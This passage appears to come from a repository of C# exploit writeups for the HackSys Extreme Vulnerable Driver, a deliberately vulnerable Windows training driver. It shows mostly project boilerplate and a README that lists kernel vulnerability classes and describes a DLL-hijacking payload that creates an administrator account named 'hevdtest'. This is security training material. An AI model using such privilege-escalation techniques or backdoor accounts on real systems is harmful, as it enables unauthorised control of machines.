// associated with an assembly.
[assembly: AssemblyTitle("UseAfterFree")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("UseAfterFree")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("22fac2cb-dc33-4345-816e-1b0caa429484")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both versions are pinned to 1.0.0.0 (no '*' wildcard), so every rebuild
// produces the same version numbers.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UseAfterFree/UseAfterFree.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}
8 | Exe
9 | UseAfterFree
10 | UseAfterFree
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteNull/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteNull/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly metadata for the WriteNull project. The Guid below matches the
// ProjectGuid in WriteNull.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("WriteNull")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("WriteNull")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("2bba4088-90c0-48e7-b68b-205bf5fd1e7e")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both versions are pinned to 1.0.0.0 (no '*' wildcard), so every rebuild
// produces the same version numbers.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteNull/WriteNull.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}
8 | Exe
9 | WriteNull
10 | WriteNull
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhere/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhere/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly metadata for the WriteWhatWhere project. The Guid below matches the
// ProjectGuid in WriteWhatWhere.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("WriteWhatWhere")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("WriteWhatWhere")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("24b73675-fd84-4db4-9f28-f6fb085450c4")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both versions are pinned to 1.0.0.0 (no '*' wildcard), so every rebuild
// produces the same version numbers.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhere/WriteWhatWhere.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}
8 | Exe
9 | WriteWhatWhere
10 | WriteWhatWhere
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhereGDI/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhereGDI/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly metadata for the WriteWhatWhereGDI project. The Guid below matches
// the ProjectGuid in WriteWhatWhereGDI.csproj.
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("WriteWhatWhereGDI")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("WriteWhatWhereGDI")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("fdd121ce-e7ec-4ed4-909c-7b4191b0d6a5")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both versions are pinned to 1.0.0.0 (no '*' wildcard), so every rebuild
// produces the same version numbers.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/WriteWhatWhereGDI/WriteWhatWhereGDI.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}
8 | Exe
9 | WriteWhatWhereGDI
10 | WriteWhatWhereGDI
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | true
18 | ..\bin\x86\Debug\
19 | DEBUG;TRACE
20 | full
21 | x86
22 | prompt
23 | MinimumRecommendedRules.ruleset
24 |
25 |
26 | ..\bin\x86\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x86
31 | prompt
32 | MinimumRecommendedRules.ruleset
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # HackSys Extreme Vulnerable Driver Writeups with CSharp
2 | My writeups for [HackSys Extreme Vulnerable Driver](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver).
3 | All writeups are written in CSharp (except for the DLL projects).
4 | Tested on the following OSes:
5 |
6 | * [Windows 7 SP1 x86](./HEVD_Win7x86)
7 | * [Windows 10 Version 1903 x64](./HEVD_Win10x64)
8 |
9 | ## Description
10 | ### Windows 7 SP1 x86
11 | To build the code, open [HEVD_Win7x86.sln](./HEVD_Win7x86/HEVD_Win7x86.sln) and run a build. All build outputs are placed in the `bin` folder under the solution directory.
12 |
13 | | Project Name| Description |
14 | | :--- | :--- |
15 | | [DoubleFetch](./HEVD_Win7x86/DoubleFetch) | Writeup for the Double Fetch vulnerability. Multiple CPU cores are required. |
16 | | [InjectLib](./HEVD_Win7x86/InjectLib) | Sample DLL for Insecure Kernel Resource Access vulnerability. This DLL attempts to add `hevdtest` user with password `Password123!` and add `hevdtest` to `Administrators` group. |
17 | | [InsecureKernelResourceAccess](./HEVD_Win7x86/InsecureKernelResourceAccess) | Writeup for Insecure Kernel Resource Access vulnerability. DLL for DLL Hijacking is required. |
18 | | [IntegerOverflow](./HEVD_Win7x86/IntegerOverflow) | Writeup for the Integer Overflow vulnerability. |
19 | | [NullPointerDereference](./HEVD_Win7x86/NullPointerDereference) | Writeup for the Null Pointer Dereference vulnerability. |
20 | | [PoolOverflow](./HEVD_Win7x86/PoolOverflow) | Writeup for the Pool Overflow vulnerability. |
21 | | [StackOverflow](./HEVD_Win7x86/StackOverflow) | Writeup for the Stack Overflow vulnerability. |
22 | | [StackOverflowGS](./HEVD_Win7x86/StackOverflowGS) | Writeup for the Stack Overflow vulnerability with a Stack Canary. |
23 | | [TypeConfusion](./HEVD_Win7x86/TypeConfusion) | Writeup for the Type Confusion vulnerability. |
24 | | [UninitializedHeapVariable](./HEVD_Win7x86/UninitializedHeapVariable) | Writeup for the Uninitialized Heap Variable vulnerability. |
25 | | [UninitializedStackVariable](./HEVD_Win7x86/UninitializedStackVariable) | Writeup for the Uninitialized Stack Variable vulnerability. |
26 | | [UseAfterFree](./HEVD_Win7x86/UseAfterFree) | Writeup for the Use-After-Free vulnerability. |
27 | | [WriteNull](./HEVD_Win7x86/WriteNull) | Writeup for the Write NULL vulnerability. |
28 | | [WriteWhatWhere](./HEVD_Win7x86/WriteWhatWhere) | Writeup for the Arbitrary Overwrite vulnerability. |
29 | | [WriteWhatWhereGDI](./HEVD_Win7x86/WriteWhatWhereGDI) | Writeup for the Arbitrary Overwrite vulnerability using a GDI memory leak. |
30 |
31 | ### Windows 10 Version 1903 x64
32 | To build the code, open [HEVD_Win10x64.sln](./HEVD_Win10x64/HEVD_Win10x64.sln) and run a build. All build outputs are placed in the `bin` folder under the solution directory.
33 |
34 | | Project Name| Description |
35 | | :--- | :--- |
36 | | [ArbitraryIncrement](./HEVD_Win10x64/ArbitraryIncrement) | Writeup for the Arbitrary Increment vulnerability. |
37 | | [ArbitraryReadWrite](./HEVD_Win10x64/ArbitraryReadWrite) | Writeup for the Arbitrary Read and Write vulnerability. |
38 | | [ArbitraryWrite](./HEVD_Win10x64/ArbitraryWrite) | Writeup for the Arbitrary Overwrite vulnerability. |
39 | | [InjectLib](./HEVD_Win10x64/InjectLib) | Sample DLL for Insecure Kernel Resource Access vulnerability. This DLL attempts to add `hevdtest` user with password `Password123!` and add `hevdtest` to `Administrators` group. |
40 | | [InsecureKernelResourceAccess](./HEVD_Win10x64/InsecureKernelResourceAccess) | Writeup for Insecure Kernel Resource Access vulnerability. DLL for DLL Hijacking is required. |
41 |
42 | ## Acknowledgments
43 | * HackSys Team ([@HackSysTeam](https://twitter.com/HackSysTeam))
44 | * b33f ([@FuzzySec](https://twitter.com/FuzzySec))
45 |
--------------------------------------------------------------------------------